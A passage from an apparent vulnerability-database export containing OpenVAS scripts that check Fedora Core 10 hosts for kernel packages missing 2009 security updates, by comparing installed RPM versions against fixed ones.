See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nUpdate to kernel 2.6.27.37:\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.36\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.37\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update kernel' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-10525\";\ntag_summary = \"The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-10525.\";\n\n\n\nif(description)\n{\n script_id(66048);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-19 21:50:22 +0200 (Mon, 19 Oct 2009)\");\n script_cve_id(\"CVE-2009-2908\", \"CVE-2009-2903\", \"CVE-2009-3290\", \"CVE-2009-2847\", \"CVE-2009-2692\", \"CVE-2009-2406\", \"CVE-2009-2407\", \"CVE-2009-1895\", \"CVE-2009-1897\", \"CVE-2009-0065\", \"CVE-2008-5079\", \"CVE-2009-2909\", \"CVE-2009-2910\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 10 FEDORA-2009-10525 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=527534\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=528887\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=526788\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug\", rpm:\"kernel-PAEdebug~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n 
report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-devel\", rpm:\"kernel-PAEdebug-devel~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-debuginfo\", rpm:\"kernel-PAEdebug-debuginfo~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bootwrapper\", rpm:\"kernel-bootwrapper~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:16", "description": "The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-11038.", "cvss3": {}, "published": "2009-11-11T00:00:00", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-11038 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-2692", "CVE-2009-3621", "CVE-2009-3638", "CVE-2008-5079", "CVE-2009-3547", "CVE-2009-3290", "CVE-2009-0065", "CVE-2009-3620", "CVE-2009-2407", "CVE-2009-2406", "CVE-2009-2908", "CVE-2009-2903", "CVE-2009-1897", "CVE-2009-3612", "CVE-2009-2847"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:66202", "href": "http://plugins.openvas.org/nasl.php?oid=66202", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_11038.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-11038 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"For details on the issues addressed with this update, please\nvisit the referenced security advisories.\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update kernel' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-11038\";\ntag_summary = \"The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-11038.\";\n\n\n\nif(description)\n{\n script_id(66202);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-11 15:56:44 +0100 (Wed, 11 Nov 2009)\");\n script_cve_id(\"CVE-2009-3547\", \"CVE-2009-3638\", \"CVE-2009-3621\", \"CVE-2009-3620\", \"CVE-2009-3612\", \"CVE-2009-2908\", \"CVE-2009-2903\", \"CVE-2009-3290\", \"CVE-2009-2847\", \"CVE-2009-2692\", \"CVE-2009-2406\", \"CVE-2009-2407\", \"CVE-2009-1895\", \"CVE-2009-1897\", \"CVE-2009-0065\", \"CVE-2008-5079\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 10 FEDORA-2009-11038 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=530490\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=530515\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=529626\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=529597\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=528868\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", 
rpm:\"kernel-PAE-devel~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug\", rpm:\"kernel-PAEdebug~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-devel\", rpm:\"kernel-PAEdebug-devel~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-debuginfo\", rpm:\"kernel-PAEdebug-debuginfo~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bootwrapper\", rpm:\"kernel-bootwrapper~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report 
+= res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:37:51", "description": "The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-11038.", "cvss3": {}, "published": "2009-11-11T00:00:00", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-11038 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-2692", "CVE-2009-3621", "CVE-2009-3638", "CVE-2008-5079", "CVE-2009-3547", "CVE-2009-3290", "CVE-2009-0065", "CVE-2009-3620", "CVE-2009-2407", "CVE-2009-2406", "CVE-2009-2908", "CVE-2009-2903", "CVE-2009-1897", "CVE-2009-3612", "CVE-2009-2847"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231066202", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066202", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_11038.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-11038 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"For details on the issues addressed with this update, please\nvisit the referenced security advisories.\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update kernel' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-11038\";\ntag_summary = \"The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-11038.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66202\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-11 15:56:44 +0100 (Wed, 11 Nov 2009)\");\n script_cve_id(\"CVE-2009-3547\", \"CVE-2009-3638\", \"CVE-2009-3621\", \"CVE-2009-3620\", \"CVE-2009-3612\", \"CVE-2009-2908\", \"CVE-2009-2903\", \"CVE-2009-3290\", \"CVE-2009-2847\", \"CVE-2009-2692\", \"CVE-2009-2406\", \"CVE-2009-2407\", \"CVE-2009-1895\", \"CVE-2009-1897\", \"CVE-2009-0065\", \"CVE-2008-5079\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 10 FEDORA-2009-11038 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=530490\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=530515\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=529626\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=529597\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=528868\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", 
rpm:\"kernel-PAE-devel~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug\", rpm:\"kernel-PAEdebug~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-devel\", rpm:\"kernel-PAEdebug-devel~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-debuginfo\", rpm:\"kernel-PAEdebug-debuginfo~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bootwrapper\", rpm:\"kernel-bootwrapper~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report 
+= res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:01", "description": "The remote host is missing an update to the kernel\nannounced via advisory FEDORA-2009-13098.", "cvss3": {}, "published": "2009-12-14T00:00:00", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-13098 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-2692", "CVE-2009-3621", "CVE-2009-3638", "CVE-2009-4005", "CVE-2008-5079", "CVE-2009-3080", "CVE-2009-3547", "CVE-2009-3290", "CVE-2009-0065", "CVE-2009-3620", "CVE-2009-2407", "CVE-2009-2406", "CVE-2009-2908", "CVE-2009-2903", "CVE-2009-1897", "CVE-2009-4031", "CVE-2009-3612", "CVE-2009-2847"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231066509", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066509", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_13098.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-13098 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nUpdate to kernel 2.6.27.41:\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.39\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.40\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.41\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update kernel' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-13098\";\ntag_summary = \"The remote host is missing an update to the kernel\nannounced via advisory FEDORA-2009-13098.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66509\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-14 23:06:43 +0100 (Mon, 14 Dec 2009)\");\n script_cve_id(\"CVE-2009-4031\", \"CVE-2009-3547\", \"CVE-2009-3638\", \"CVE-2009-3621\", \"CVE-2009-3620\", \"CVE-2009-3612\", \"CVE-2009-2908\", \"CVE-2009-2903\", \"CVE-2009-3290\", \"CVE-2009-2847\", \"CVE-2009-2692\", \"CVE-2009-2406\", \"CVE-2009-2407\", \"CVE-2009-1895\", \"CVE-2009-1897\", \"CVE-2009-0065\", \"CVE-2008-5079\", \"CVE-2009-3080\", \"CVE-2009-4005\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 10 FEDORA-2009-13098 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright 
(c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=539414\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=539435\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=541160\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug\", rpm:\"kernel-PAEdebug~2.6.27.41~170.2.117.fc10\", 
